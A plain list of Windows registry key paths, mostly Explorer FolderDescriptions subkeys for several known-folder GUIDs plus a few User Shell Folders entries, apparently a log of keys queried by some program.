HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{8983036C-27C0-404B-8F08-102D10DCFD74}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{8983036C-27C0-404B-8F08-102D10DCFD74}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{8983036C-27C0-404B-8F08-102D10DCFD74}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{8983036C-27C0-404B-8F08-102D10DCFD74}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{8983036C-27C0-404B-8F08-102D10DCFD74}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{8983036C-27C0-404B-8F08-102D10DCFD74}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{8983036C-27C0-404B-8F08-102D10DCFD74}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{8983036C-27C0-404B-8F08-102D10DCFD74}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{8983036C-27C0-404B-8F08-102D10DCFD74}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{8983036C-27C0-404B-8F08-102D10DCFD74}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{8983036C-27C0-404B-8F08-102D10DCFD74}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{8983036C-27C0-404B-8F08-102D10DCFD74}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{8983036C-27C0-404B-8F08-102D10DCFD74}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{8983036C-27C0-404B-8F08-102D10DCFD74}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{8983036C-27C0-404B-8F08-102D10DCFD74}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{8983036C-27C0-404B-8F08-102D10DCFD74}\InitFolderHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{8983036C-27C0-404B-8F08-102D10DCFD74}\PropertyBag
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\SendTo
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{AE50C081-EBD2-438A-8655-8A092E34987A}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{AE50C081-EBD2-438A-8655-8A092E34987A}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{AE50C081-EBD2-438A-8655-8A092E34987A}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{AE50C081-EBD2-438A-8655-8A092E34987A}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{AE50C081-EBD2-438A-8655-8A092E34987A}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{AE50C081-EBD2-438A-8655-8A092E34987A}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{AE50C081-EBD2-438A-8655-8A092E34987A}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{AE50C081-EBD2-438A-8655-8A092E34987A}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{AE50C081-EBD2-438A-8655-8A092E34987A}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{AE50C081-EBD2-438A-8655-8A092E34987A}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{AE50C081-EBD2-438A-8655-8A092E34987A}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{AE50C081-EBD2-438A-8655-8A092E34987A}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{AE50C081-EBD2-438A-8655-8A092E34987A}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{AE50C081-EBD2-438A-8655-8A092E34987A}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{AE50C081-EBD2-438A-8655-8A092E34987A}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{AE50C081-EBD2-438A-8655-8A092E34987A}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{AE50C081-EBD2-438A-8655-8A092E34987A}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{AE50C081-EBD2-438A-8655-8A092E34987A}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{AE50C081-EBD2-438A-8655-8A092E34987A}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{AE50C081-EBD2-438A-8655-8A092E34987A}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{AE50C081-EBD2-438A-8655-8A092E34987A}\InitFolderHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{AE50C081-EBD2-438A-8655-8A092E34987A}\PropertyBag
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Recent
HKEY_CLASSES_ROOT\CLSID\{0C39A5CF-1A7A-40C8-BA74-8900E6DF5FCD}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B97D20BB-F46A-4C97-BA10-5E3608430854}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B97D20BB-F46A-4C97-BA10-5E3608430854}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B97D20BB-F46A-4C97-BA10-5E3608430854}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B97D20BB-F46A-4C97-BA10-5E3608430854}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B97D20BB-F46A-4C97-BA10-5E3608430854}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B97D20BB-F46A-4C97-BA10-5E3608430854}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B97D20BB-F46A-4C97-BA10-5E3608430854}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B97D20BB-F46A-4C97-BA10-5E3608430854}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B97D20BB-F46A-4C97-BA10-5E3608430854}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B97D20BB-F46A-4C97-BA10-5E3608430854}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B97D20BB-F46A-4C97-BA10-5E3608430854}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B97D20BB-F46A-4C97-BA10-5E3608430854}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B97D20BB-F46A-4C97-BA10-5E3608430854}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B97D20BB-F46A-4C97-BA10-5E3608430854}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B97D20BB-F46A-4C97-BA10-5E3608430854}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B97D20BB-F46A-4C97-BA10-5E3608430854}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B97D20BB-F46A-4C97-BA10-5E3608430854}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B97D20BB-F46A-4C97-BA10-5E3608430854}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B97D20BB-F46A-4C97-BA10-5E3608430854}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B97D20BB-F46A-4C97-BA10-5E3608430854}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B97D20BB-F46A-4C97-BA10-5E3608430854}\InitFolderHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B97D20BB-F46A-4C97-BA10-5E3608430854}\PropertyBag
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Startup
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1777F761-68AD-4D8A-87BD-30B759FA33DD}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1777F761-68AD-4D8A-87BD-30B759FA33DD}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1777F761-68AD-4D8A-87BD-30B759FA33DD}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1777F761-68AD-4D8A-87BD-30B759FA33DD}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1777F761-68AD-4D8A-87BD-30B759FA33DD}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1777F761-68AD-4D8A-87BD-30B759FA33DD}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1777F761-68AD-4D8A-87BD-30B759FA33DD}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1777F761-68AD-4D8A-87BD-30B759FA33DD}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1777F761-68AD-4D8A-87BD-30B759FA33DD}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1777F761-68AD-4D8A-87BD-30B759FA33DD}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1777F761-68AD-4D8A-87BD-30B759FA33DD}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1777F761-68AD-4D8A-87BD-30B759FA33DD}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1777F761-68AD-4D8A-87BD-30B759FA33DD}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1777F761-68AD-4D8A-87BD-30B759FA33DD}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1777F761-68AD-4D8A-87BD-30B759FA33DD}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1777F761-68AD-4D8A-87BD-30B759FA33DD}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1777F761-68AD-4D8A-87BD-30B759FA33DD}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1777F761-68AD-4D8A-87BD-30B759FA33DD}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1777F761-68AD-4D8A-87BD-30B759FA33DD}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1777F761-68AD-4D8A-87BD-30B759FA33DD}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1777F761-68AD-4D8A-87BD-30B759FA33DD}\InitFolderHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1777F761-68AD-4D8A-87BD-30B759FA33DD}\PropertyBag
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Favorites
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{F3CE0F7C-4901-4ACC-8648-D5D44B04EF8F}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{F3CE0F7C-4901-4ACC-8648-D5D44B04EF8F}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{F3CE0F7C-4901-4ACC-8648-D5D44B04EF8F}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{F3CE0F7C-4901-4ACC-8648-D5D44B04EF8F}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{F3CE0F7C-4901-4ACC-8648-D5D44B04EF8F}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{F3CE0F7C-4901-4ACC-8648-D5D44B04EF8F}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{F3CE0F7C-4901-4ACC-8648-D5D44B04EF8F}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{F3CE0F7C-4901-4ACC-8648-D5D44B04EF8F}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{F3CE0F7C-4901-4ACC-8648-D5D44B04EF8F}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{F3CE0F7C-4901-4ACC-8648-D5D44B04EF8F}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{F3CE0F7C-4901-4ACC-8648-D5D44B04EF8F}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{F3CE0F7C-4901-4ACC-8648-D5D44B04EF8F}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{F3CE0F7C-4901-4ACC-8648-D5D44B04EF8F}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{F3CE0F7C-4901-4ACC-8648-D5D44B04EF8F}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{F3CE0F7C-4901-4ACC-8648-D5D44B04EF8F}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{F3CE0F7C-4901-4ACC-8648-D5D44B04EF8F}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{F3CE0F7C-4901-4ACC-8648-D5D44B04EF8F}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{F3CE0F7C-4901-4ACC-8648-D5D44B04EF8F}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{F3CE0F7C-4901-4ACC-8648-D5D44B04EF8F}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{F3CE0F7C-4901-4ACC-8648-D5D44B04EF8F}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{F3CE0F7C-4901-4ACC-8648-D5D44B04EF8F}\InitFolderHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{F3CE0F7C-4901-4ACC-8648-D5D44B04EF8F}\PropertyBag
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{FDD39AD0-238F-46AF-ADB4-6C85480369C7}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{FDD39AD0-238F-46AF-ADB4-6C85480369C7}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{FDD39AD0-238F-46AF-ADB4-6C85480369C7}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{FDD39AD0-238F-46AF-ADB4-6C85480369C7}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{FDD39AD0-238F-46AF-ADB4-6C85480369C7}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{FDD39AD0-238F-46AF-ADB4-6C85480369C7}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{FDD39AD0-238F-46AF-ADB4-6C85480369C7}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{FDD39AD0-238F-46AF-ADB4-6C85480369C7}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{FDD39AD0-238F-46AF-ADB4-6C85480369C7}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{FDD39AD0-238F-46AF-ADB4-6C85480369C7}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{FDD39AD0-238F-46AF-ADB4-6C85480369C7}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{FDD39AD0-238F-46AF-ADB4-6C85480369C7}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{FDD39AD0-238F-46AF-ADB4-6C85480369C7}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{FDD39AD0-238F-46AF-ADB4-6C85480369C7}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{FDD39AD0-238F-46AF-ADB4-6C85480369C7}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{FDD39AD0-238F-46AF-ADB4-6C85480369C7}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{FDD39AD0-238F-46AF-ADB4-6C85480369C7}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{FDD39AD0-238F-46AF-ADB4-6C85480369C7}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{FDD39AD0-238F-46AF-ADB4-6C85480369C7}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{FDD39AD0-238F-46AF-ADB4-6C85480369C7}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{FDD39AD0-238F-46AF-ADB4-6C85480369C7}\InitFolderHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{FDD39AD0-238F-46AF-ADB4-6C85480369C7}\PropertyBag
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Personal
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A77F5D77-2E2B-44C3-A6A2-ABA601054A51}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A77F5D77-2E2B-44C3-A6A2-ABA601054A51}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A77F5D77-2E2B-44C3-A6A2-ABA601054A51}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A77F5D77-2E2B-44C3-A6A2-ABA601054A51}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A77F5D77-2E2B-44C3-A6A2-ABA601054A51}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A77F5D77-2E2B-44C3-A6A2-ABA601054A51}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A77F5D77-2E2B-44C3-A6A2-ABA601054A51}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A77F5D77-2E2B-44C3-A6A2-ABA601054A51}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A77F5D77-2E2B-44C3-A6A2-ABA601054A51}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A77F5D77-2E2B-44C3-A6A2-ABA601054A51}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A77F5D77-2E2B-44C3-A6A2-ABA601054A51}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A77F5D77-2E2B-44C3-A6A2-ABA601054A51}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A77F5D77-2E2B-44C3-A6A2-ABA601054A51}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A77F5D77-2E2B-44C3-A6A2-ABA601054A51}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A77F5D77-2E2B-44C3-A6A2-ABA601054A51}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A77F5D77-2E2B-44C3-A6A2-ABA601054A51}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A77F5D77-2E2B-44C3-A6A2-ABA601054A51}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A77F5D77-2E2B-44C3-A6A2-ABA601054A51}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A77F5D77-2E2B-44C3-A6A2-ABA601054A51}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A77F5D77-2E2B-44C3-A6A2-ABA601054A51}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A77F5D77-2E2B-44C3-A6A2-ABA601054A51}\InitFolderHandler
